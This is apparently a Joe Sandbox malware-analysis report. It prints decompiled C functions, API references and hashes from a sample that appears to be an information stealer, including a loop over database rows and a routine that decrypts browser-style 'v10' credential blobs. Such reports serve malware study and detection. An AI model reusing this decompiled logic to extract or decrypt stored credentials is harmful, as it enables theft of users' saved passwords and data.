Instruction ID: 7603ac4355cf5b8a2f6e8334a01d4e148da9d4a5b2be0a8311e37190e8e22192
Opcode Fuzzy Hash: a067fa9aa66848bc42d69728368930e1c48be6e022443f56fa634f8f40c33e55
Instruction Fuzzy Hash: 4C31B6B1900118ABCB14EBA8DD46FDA73B8AF08704F0085A4F709D3251D634DEA5CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00408510, Relevance: 9.1, APIs: 6, Instructions: 92
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00408510(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				char _v8;
				char _v276;
				char _v280;
				char _v284;
				intOrPtr _v288;
				CHAR* _t25;
				void* _t28;
				void* _t30;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t56;
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t67;

				E0040B720( &_v276, 0x104);
				_t25 =  *0x41a07c; // 0x2e4b000
				wsprintfA( &_v276, _t25, _a12, _a8);
				_t28 =  *0x41a830(_a4,  &_v8);
				_t63 = _t61 + 0x18;
				if(_t28 == 0) {
					_t56 =  *0x41a430; // 0x2e4b0e0
					_t30 =  *0x41a7e8(_v8, _t56, 0xffffffff,  &_v280, 0);
					_t64 = _t63 + 0x14;
					if(_t30 != 0) {
						L6:
						 *0x41a808(_v280);
						return  *0x41a834(_v8);
					}
					_v284 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t36 =  *0x41a804(_v280);
						_t67 = _t64 + 4;
						if(_t36 != 0x64) {
							break;
						}
						_t42 =  *0x41a820(_v280, 0);
						_t64 = _t67 + 8;
						_v288 = _t42;
						 *0x41aa24(_v284, _v288);
						 *0x41aa24(_v284, "\n");
					}
					E004137E0(_a24,  &_v276, _v284,  *0x41a908(_v284));
					_t64 = _t67 + 0x10;
					E0040B720( &_v284, 4);
					goto L6;
				}
				return _t28;
			}

0x00408525
0x00408532
0x0040853f
0x00408550
0x00408556
0x0040855b
0x0040856c
0x00408577
0x0040857d
0x00408582
0x0040862d
0x00408634
0x00000000
0x00408647
0x0040859c
0x004085a2
0x004085a9
0x004085af
0x004085b5
0x00000000
0x00000000
0x004085c0
0x004085c6
0x004085c9
0x004085dd
0x004085ef
0x004085ef
0x00408617
0x0040861c
0x00408628
0x00000000
0x00408628
0x0040864d

APIs

wsprintfA.USER32 ref: 0040853F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040858F
RtlAllocateHeap.NTDLL(00000000), ref: 00408596
lstrcat.KERNEL32(?,?), ref: 004085DD
lstrcat.KERNEL32(?,00418BC4), ref: 004085EF
lstrlen.KERNEL32(?), ref: 004085FE

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heaplstrcat$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 2177231248-0
Opcode ID: d86f877f6af101afd853e83cc45e0c7f259d9c1cd7a3b3c2d6ea3d455249c9be
Instruction ID: 16a89e7602ce9a9af0cb90aa00b31cd04fc627f3dd9fe4cd639e4c9769f6db21
Opcode Fuzzy Hash: d86f877f6af101afd853e83cc45e0c7f259d9c1cd7a3b3c2d6ea3d455249c9be
Instruction Fuzzy Hash: 0F3198B1900108ABCB14EFA4DD46EDA7378AF48705F0085A8F719D7191DA35DAA1CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 02D275D0, Relevance: 9.1, APIs: 6, Instructions: 77filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,02D27900,00000000,?), ref: 02D275F7
GetFileSizeEx.KERNEL32(000000FF,02D27900,?,02D27900,00000000,?), ref: 02D2761C
LocalAlloc.KERNEL32(00000040,?,?,02D27900), ref: 02D2763C
ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000,?,02D27900), ref: 02D27665
LocalFree.KERNEL32(?), ref: 02D2769B
CloseHandle.KERNEL32(000000FF,?,02D27900,00000000,?), ref: 02D276A5

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 4e0f13bd6030b2d39f57ca96a85e1861cdcda2e923e2d8cd49f8341b4bf1824a
Instruction ID: 477481f6b57b3d43d4dfbafa85a91d04b35739a34c42b41365b090c35c8e0ebc
Opcode Fuzzy Hash: 4e0f13bd6030b2d39f57ca96a85e1861cdcda2e923e2d8cd49f8341b4bf1824a
Instruction Fuzzy Hash: 03310CB4A00209EFEB14DF98C884BEEB7B5FF48315F108198E915AB390C774AA55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00407380, Relevance: 9.1, APIs: 6, Instructions: 77
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00407380(CHAR* _a4, void** _a8, long* _a12) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				intOrPtr _v24;
				long _v28;
				long _v32;

				_v8 = 0;
				_v16 = 0;
				_v16 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
				if(_v16 == 0 || _v16 == 0xffffffff) {
					L12:
					return _v8;
				} else {
					_push( &_v28);
					_push(_v16);
					if( *0x41a868() != 0 && _v24 == 0) {
						 *_a12 = _v28;
						 *_a8 = LocalAlloc(0x40,  *_a12);
						if( *_a8 != 0) {
							if(ReadFile(_v16,  *_a8,  *_a12,  &_v12, 0) == 0 ||  *_a12 != _v12) {
								_v32 = 0;
							} else {
								_v32 = 1;
							}
							_v8 = _v32;
							if(_v8 == 0) {
								LocalFree( *_a8);
							}
						}
					}
					CloseHandle(_v16);
					goto L12;
				}
			}

0x00407386
0x0040738d
0x004073ad
0x004073b4
0x0040745b
0x00407461
0x004073c4
0x004073c7
0x004073cb
0x004073d4
0x004073e2
0x004073f5
0x004073fd
0x0040741d
0x00407432
0x00407429
0x00407429
0x00407429
0x0040743c
0x00407443
0x0040744b
0x0040744b
0x00407443
0x004073fd
0x00407455
0x00000000
0x00407455

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,004076B0,00000000,?), ref: 004073A7
GetFileSizeEx.KERNEL32(000000FF,004076B0,?,004076B0,00000000,?), ref: 004073CC
LocalAlloc.KERNEL32(00000040,?,?,004076B0), ref: 004073EC
ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000,?,004076B0), ref: 00407415
LocalFree.KERNEL32(?), ref: 0040744B
CloseHandle.KERNEL32(000000FF,?,004076B0,00000000,?), ref: 00407455

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 4e0f13bd6030b2d39f57ca96a85e1861cdcda2e923e2d8cd49f8341b4bf1824a
Instruction ID: af94470c476782e88e9ea84d45e590fd848c7c035798b2791f751b67d2b5900f
Opcode Fuzzy Hash: 4e0f13bd6030b2d39f57ca96a85e1861cdcda2e923e2d8cd49f8341b4bf1824a
Instruction Fuzzy Hash: 1A31DBB4A04209EFDB14DF94C888BAEBBB5FF48310F108169E915AB3D0C778AA55CF55

Uniqueness

Uniqueness Score: -1.00%

Function 02D26B40, Relevance: 9.1, APIs: 6, Instructions: 75timestringCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,00000104), ref: 02D26BC1
lstrcat.KERNEL32(?,0041A60C), ref: 02D26BD5
sscanf.NTDLL ref: 02D26C13
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D26C27
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D26C38
ExitProcess.KERNEL32 ref: 02D26C52

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Time$System$File$ExitProcesslstrcatsscanf
String ID:
API String ID: 2797641603-0
Opcode ID: c61bb436b804f0d06a8e2a80b3f30031f21c3dbbfd9811cb7010ad7d772f11a9
Instruction ID: 3000b87bbce2435fdf47e719b690af0e03c5a47213c3b3a3d883b51251da1956
Opcode Fuzzy Hash: c61bb436b804f0d06a8e2a80b3f30031f21c3dbbfd9811cb7010ad7d772f11a9
Instruction Fuzzy Hash: 7831E0B2D1121C9BCB54DF94DD85ADEB7B9AF48300F0085EAE109A2250EB345B98CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02D24BC0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,10000000,0000003C,?,0000003C,?,00000040), ref: 02D24C00
InternetCrackUrlA.WININET(?,00000000), ref: 02D24C0B

Strings

@, xrefs: 02D24BEC
http, xrefs: 02D24C1C
<, xrefs: 02D24BDF

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: CrackInternetlstrlen
String ID: <$@$http
API String ID: 1274457161-26727890
Opcode ID: 6422e5e96578678ae9ecef98c78aa7527ca494f69da9eb8f7ec7ae06e64f97c9
Instruction ID: 451911337f91dabcbf54e8c79b71a9958de3731aa147b80ccd5260fce41828ec
Opcode Fuzzy Hash: 6422e5e96578678ae9ecef98c78aa7527ca494f69da9eb8f7ec7ae06e64f97c9
Instruction Fuzzy Hash: 2FF0B2B590121CABDB14EFE4E884FDD77BDEB44344F008519FA04AA250DB74A948DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACE0() {
				struct _SYSTEMTIME _v20;
				void* _v24;

				_v24 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				GetLocalTime( &_v20);
				wsprintfA(_v24, "%d/%d/%d %d:%d:%d", _v20.wDay & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wYear & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				return _v24;
			}

0x0040acfa
0x0040ad01
0x0040ad2e
0x0040ad3d

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,004057BA,?,?,?,?,00000104,?,00001388), ref: 0040ACED
RtlAllocateHeap.NTDLL(00000000), ref: 0040ACF4
GetLocalTime.KERNEL32(?,?,?,?,?,?,004057BA,?,?,?,?,00000104,?,00001388), ref: 0040AD01
wsprintfA.USER32 ref: 0040AD2E

Strings

%d/%d/%d %d:%d:%d, xrefs: 0040AD25

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: %d/%d/%d %d:%d:%d
API String ID: 377395780-1073349071
Opcode ID: 8e285d3c0eb36019000bcc5d6a07b144cb12c9e005f16ceaedbebfc32425e432
Instruction ID: d54db4264a189618d18ac0c6d63712439e5e5702a0e8137862d75125f6334758
Opcode Fuzzy Hash: 8e285d3c0eb36019000bcc5d6a07b144cb12c9e005f16ceaedbebfc32425e432
Instruction Fuzzy Hash: 2FF06DB5800118BBCB10DBE99D489FFB3B8BF0CB02F00415AFA41A1180E6388A90D776

Uniqueness

Uniqueness Score: -1.00%

Function 00404970, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00404970(void* __ecx, void* __eflags, char* _a4) {
				intOrPtr _v56;
				char* _v60;
				char _v64;
				char _v132;

				E0040B720( &_v132, 0x40);
				E0040B720( &_v64, 0x3c);
				_v64 = 0x3c;
				_v60 =  &_v132;
				_v56 = 0x40;
				_push( &_v64);
				if(InternetCrackUrlA(_a4,  *0x41a908(), _a4, 0x10000000) == 0) {
					return 0x418b7c;
				}
				return _v60;
			}

0x0040497f
0x0040498a
0x0040498f
0x00404999
0x0040499c
0x004049a6
0x004049c3
0x00000000
0x004049cc
0x00000000

APIs

lstrlen.KERNEL32(?,10000000,0000003C,?,0000003C,?,00000040), ref: 004049B0
InternetCrackUrlA.WININET(?,00000000), ref: 004049BB

Strings

@, xrefs: 0040499C
http, xrefs: 004049CC
<, xrefs: 0040498F

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: CrackInternetlstrlen
String ID: <$@$http
API String ID: 1274457161-26727890
Opcode ID: 953279faeda4fbfed10a865a9ed3943784a545a7601c943f1e9572a566367c12
Instruction ID: e6804194f0461931acba1e2b3008128b19c1605eb91d96f529587f083f9a09b0
Opcode Fuzzy Hash: 953279faeda4fbfed10a865a9ed3943784a545a7601c943f1e9572a566367c12
Instruction Fuzzy Hash: 84F012F590020CABDB04DFA5E885FEE7B7CEB44344F008529FA04AB190DB78A5448B99

Uniqueness

Uniqueness Score: -1.00%

Function 02D31D80, Relevance: 7.7, APIs: 5, Instructions: 156COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D31DF4

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 71429949b35bca6c2b28703409f240b6d994fc7f714cc6e6faf466484dc4969f
Instruction ID: 9b450115f85ebf594b98b89374c6bef6f6f46558bc79e3ef191072a62863a7f9
Opcode Fuzzy Hash: 71429949b35bca6c2b28703409f240b6d994fc7f714cc6e6faf466484dc4969f
Instruction Fuzzy Hash: 7B61E7B4A0020ADFDB15CF54C944BAAB7F1BB48355F208658E849AB381C775EE81CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00411B30, Relevance: 7.7, APIs: 5, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411B30(intOrPtr __ecx, signed int _a4, long _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _t90;
				intOrPtr _t112;
				intOrPtr _t136;
				intOrPtr _t141;

				_v24 = __ecx;
				if( *(_v24 + 4) != 0 ||  *(_v24 + 0xc) != 0 ||  *((intOrPtr*)(_v24 + 0x20)) != 0 ||  *((intOrPtr*)(_v24 + 0x18)) != 0 ||  *((intOrPtr*)(_v24 + 0x14)) != 0 || ( *(_v24 + 0x2c) & 0x000000ff) != 0) {
					return 0x1000000;
				} else {
					__eflags = _a12 - 1;
					if(_a12 != 1) {
						__eflags = _a12 - 2;
						if(__eflags != 0) {
							__eflags = _a12 - 3;
							if(_a12 != 3) {
								return 0x10000;
							}
							_v20 = _a8;
							__eflags = _v20;
							if(_v20 != 0) {
								__eflags = _a4;
								if(_a4 == 0) {
									 *(_v24 + 0xc) = CreateFileMappingW(0xffffffff, 0, 4, 0, _v20, 0);
									_t90 = _v24;
									__eflags =  *(_t90 + 0xc);
									if( *(_t90 + 0xc) != 0) {
										 *((intOrPtr*)(_v24 + 0x20)) = MapViewOfFile( *(_v24 + 0xc), 0xf001f, 0, 0, _v20);
										_t136 = _v24;
										__eflags =  *(_t136 + 0x20);
										if( *(_t136 + 0x20) != 0) {
											L25:
											 *((char*)(_v24 + 0x1c)) = 1;
											 *(_v24 + 0x24) = 0;
											 *(_v24 + 0x28) = _v20;
											return 0;
										}
										CloseHandle( *(_v24 + 0xc));
										 *(_v24 + 0xc) = 0;
										return 0x300;
									}
									return 0x300;
								}
								 *((intOrPtr*)(_v24 + 0x20)) = _a4;
								goto L25;
							}
							return 0x30000;
						}
						_v16 = _a4;
						 *(_v24 + 4) = CreateFileW(E0040B5C0(__eflags, _v16), 0x40000000, 0, 0, 2, 0x80, 0);
						_t141 = _v24;
						__eflags =  *((intOrPtr*)(_t141 + 4)) - 0xffffffff;
						if( *((intOrPtr*)(_t141 + 4)) != 0xffffffff) {
							 *((char*)(_v24 + 0x1c)) = 1;
							 *(_v24 + 0x10) = 0;
							 *((char*)(_v24 + 8)) = 1;
							return 0;
						}
						 *(_v24 + 4) = 0;
						return 0x200;
					}
					_v12 = _a4;
					 *(_v24 + 4) = _v12;
					 *((char*)(_v24 + 8)) = 0;
					_v8 = SetFilePointer( *(_v24 + 4), 0, 0, 1);
					__eflags = _v8 - 0xffffffff;
					 *((char*)(_v24 + 0x1c)) = 0 | _v8 != 0xffffffff;
					_t112 = _v24;
					__eflags =  *(_t112 + 0x1c) & 0x000000ff;
					if(( *(_t112 + 0x1c) & 0x000000ff) == 0) {
						 *(_v24 + 0x10) = 0;
					} else {
						 *(_v24 + 0x10) = _v8;
					}
					return 0;
				}
			}

0x00411b36
0x00411b40
0x00000000
0x00411b7b
0x00411b7b
0x00411b7f
0x00411be8
0x00411bec
0x00411c60
0x00411c64
0x00000000
0x00411d22
0x00411c6d
0x00411c70
0x00411c74
0x00411c80
0x00411c84
0x00411ca8
0x00411cab
0x00411cae
0x00411cb2
0x00411cd8
0x00411cdb
0x00411cde
0x00411ce2
0x00411d02
0x00411d05
0x00411d0c
0x00411d19
0x00000000
0x00411d1c
0x00411ceb
0x00411cf4
0x00000000
0x00411cfb
0x00000000
0x00411cb4
0x00411c8c
0x00000000
0x00411c8c
0x00000000
0x00411c76
0x00411bf1
0x00411c1c
0x00411c1f
0x00411c22
0x00411c26
0x00411c3f
0x00411c46
0x00411c50
0x00000000
0x00411c54
0x00411c2b
0x00000000
0x00411c32
0x00411b84
0x00411b8d
0x00411b93
0x00411baa
0x00411baf
0x00411bb9
0x00411bbc
0x00411bc3
0x00411bc5
0x00411bd5
0x00411bc7
0x00411bcd
0x00411bcd
0x00000000
0x00411bdc

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 00411BA4

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9f40ca25f5a3ec3b26c5a317c37b390bac11bb664fe97661c3bbb8a15347b8b4
Instruction ID: 4806281024cf892df001f217e22b508f46e279854f8b30cdef803a4c5b02db50
Opcode Fuzzy Hash: 9f40ca25f5a3ec3b26c5a317c37b390bac11bb664fe97661c3bbb8a15347b8b4
Instruction Fuzzy Hash: 49611BB4A0020ADFEB14CF54D585BAEB7B1BB04315F208259E9156B3D1D378EE81CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D27480, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 104memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D274D2
LocalAlloc.KERNEL32(00000040,?), ref: 02D27521
lstrcat.KERNEL32(?,00000000), ref: 02D27587

Strings

v10, xrefs: 02D2749E
@, xrefs: 02D274DA

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: AllocLocallstrcatmemset
String ID: @$v10
API String ID: 4123878530-24753345
Opcode ID: d133a81001bef52ef4905997addc9da99a5f8824d4606433a0d426c6760a33b5
Instruction ID: 2f530ad20acede9cb9d3e8de282ff8489da0480dd38265904a56cf5c8d92b434
Opcode Fuzzy Hash: d133a81001bef52ef4905997addc9da99a5f8824d4606433a0d426c6760a33b5
Instruction Fuzzy Hash: 3B412971A00218ABEB14CF94D844BEEB7B9FB58348F048159F505AB284D774AA49CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407230, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 104
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00407230(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				long _v80;
				void* _v84;
				int _v88;
				char _v5092;
				void* _t58;
				void* _t94;

				E004139B0(0x13e0, __ecx);
				if(_a8 < 3) {
					L10:
					return E00407190(_a4, _a8);
				}
				asm("repe cmpsb");
				if(0 != 0) {
					goto L10;
				}
				if(((0 | _a12 != 0x00000000) & (0 | _a16 != 0x00000000)) == 0) {
					return 0x4191a0;
				}
				memset( &_v76, 0, 0x40);
				_v76 = 0x40;
				_v72 = 1;
				_v68 = _a4 + 3;
				_v64 = 0xc;
				_v52 = _v68 + _a8 - 0x13;
				_v48 = 0x10;
				_v80 = _a8 - 3 - _v64 - _v48;
				_t58 = LocalAlloc(0x40, _v80);
				_v84 = _t58;
				if(_v84 == 0) {
					return _t58;
				}
				_v88 = 0;
				_v8 =  *0x41aa60(_a16, _v68 + _v64, _v80,  &_v76, 0, 0, _v84, _v80,  &_v88, 0);
				if(_v8 < 0) {
					return 0x4191a0;
				}
				E0040B720( &_v5092, 0x1388);
				 *0x41aa24( &_v5092, _v84);
				 *((char*)(_t94 + _v88 - 0x13e0)) = 0;
				return  &_v5092;
			}

0x00407238
0x00407243
0x00407364
0x00000000
0x00407371
0x00407258
0x0040725a
0x00000000
0x00000000
0x00407274
0x00000000
0x0040735b
0x00407282
0x0040728a
0x00407291
0x0040729e
0x004072a1
0x004072b2
0x004072b5
0x004072c8
0x004072d1
0x004072d7
0x004072de
0x00000000
0x00407359
0x004072e0
0x00407312
0x00407319
0x00000000
0x00407352
0x00407327
0x00407337
0x00407340
0x00000000

APIs

memset.MSVCRT ref: 00407282
LocalAlloc.KERNEL32(00000040,?), ref: 004072D1
lstrcat.KERNEL32(?,00000000), ref: 00407337

Strings

v10, xrefs: 0040724E
@, xrefs: 0040728A

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: AllocLocallstrcatmemset
String ID: @$v10
API String ID: 4123878530-24753345
Opcode ID: 1d3fa7b3dbb26fb9b049f7610d81cb1348bb2620b3692f3626651eae948cc07e
Instruction ID: 61f64e7557948a46b50732eb2c11968d7e6d1a4f1abee3a4cf4d88c7128a29d2
Opcode Fuzzy Hash: 1d3fa7b3dbb26fb9b049f7610d81cb1348bb2620b3692f3626651eae948cc07e
Instruction Fuzzy Hash: D24150B1E04208EBEB14CFD4D884BDEB7B4FF48344F048169F905AB284D778AA45DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 02D2B810, Relevance: 7.6, APIs: 5, Instructions: 50stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000003,00000000,00000000,?), ref: 02D2B81E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 02D2B82D
new[].LIBCMTD ref: 02D2B84D
lstrlen.KERNEL32(?,?,?), ref: 02D2B86A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 02D2B879

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$new[]
String ID:
API String ID: 4156461339-0
Opcode ID: 56f75f690b4901e2c4a4253c133e8f5cdaa2a479b23792dede6667cee38b773e
Instruction ID: 521854049713643c8114195df0fecfd954175c13ab95f4961a76474efc7c959e
Opcode Fuzzy Hash: 56f75f690b4901e2c4a4253c133e8f5cdaa2a479b23792dede6667cee38b773e
Instruction Fuzzy Hash: 390144B5A01208BFDB04DFA8DC46F9E7BB8EF4C300F108058F909DB390D670AA518B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5C0, Relevance: 7.6, APIs: 5, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040B5C0(void* __eflags, char* _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _t50;

				_t50 = __eflags;
				_v12 = MultiByteToWideChar(0, 0, _a4,  *0x41a908(0), _a4, 0);
				_v16 = E0040B590( ~(0 | _t50 > 0x00000000) | (_v12 + 0x00000001) * 0x00000002,  ~(0 | _t50 > 0x00000000) | (_v12 + 0x00000001) * 0x00000002);
				_v8 = _v16;
				MultiByteToWideChar(0, 0, _a4,  *0x41a908(_v12), _a4, _v8);
				 *((short*)(_v8 + _v12 * 2)) = 0;
				return _v8;
			}

0x0040b5c0
0x0040b5e3
0x0040b605
0x0040b60b
0x0040b629
0x0040b637
0x0040b641

APIs

lstrlen.KERNEL32(00000080,00000000,00000000,00000002,00000080,00000000), ref: 0040B5CE
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 0040B5DD
new[].LIBCMTD ref: 0040B5FD
lstrlen.KERNEL32(?,?,?), ref: 0040B61A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 0040B629

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$new[]
String ID:
API String ID: 4156461339-0
Opcode ID: bcc2d0ee6c9e6d66abe1afca29a4e1eb62fb6bff9411518d967b05a7183445a3
Instruction ID: 4e01539bb3d2c282a73af516c558e114f3eec2120aea2764bae626352bcff954
Opcode Fuzzy Hash: bcc2d0ee6c9e6d66abe1afca29a4e1eb62fb6bff9411518d967b05a7183445a3
Instruction Fuzzy Hash: 000104B5A01108BFDB44DFA8DD46F9E7BB8EF4C304F108158F509DB290D671AA518B55

Uniqueness

Uniqueness Score: -1.00%

Function 02D2B2E0, Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2B2F4
RtlAllocateHeap.NTDLL(00000000), ref: 02D2B2FB
RegOpenKeyExA.ADVAPI32(80000002,0041A3F4,00000000,00020119,02D25B58), ref: 02D2B31B
RegQueryValueExA.ADVAPI32(02D25B58,0041A4DC,00000000,00000000,?,000000FF), ref: 02D2B33C
RegCloseKey.ADVAPI32(02D25B58), ref: 02D2B346

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: df4039e8785e81f7b3363609146fe50ac8c96b68d8374592efb58b1d304fb9ce
Instruction ID: aab03c178f1c5d230aecb9c97ab0d40cf41dbfa96ccbcffcf61c36088d498af2
Opcode Fuzzy Hash: df4039e8785e81f7b3363609146fe50ac8c96b68d8374592efb58b1d304fb9ce
Instruction Fuzzy Hash: 0A014FB5A41208BFD700DFE0DD49FEEB7B8EB48704F008568FA05A7291D6B45A50CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02D2B490, Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2B4A4
RtlAllocateHeap.NTDLL(00000000), ref: 02D2B4AB
RegOpenKeyExA.ADVAPI32(80000002,0041A610,00000000,00020119,02D25CA8), ref: 02D2B4CB
RegQueryValueExA.ADVAPI32(02D25CA8,0041A1F4,00000000,00000000,?,000000FF), ref: 02D2B4EC
RegCloseKey.ADVAPI32(02D25CA8), ref: 02D2B4F6

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
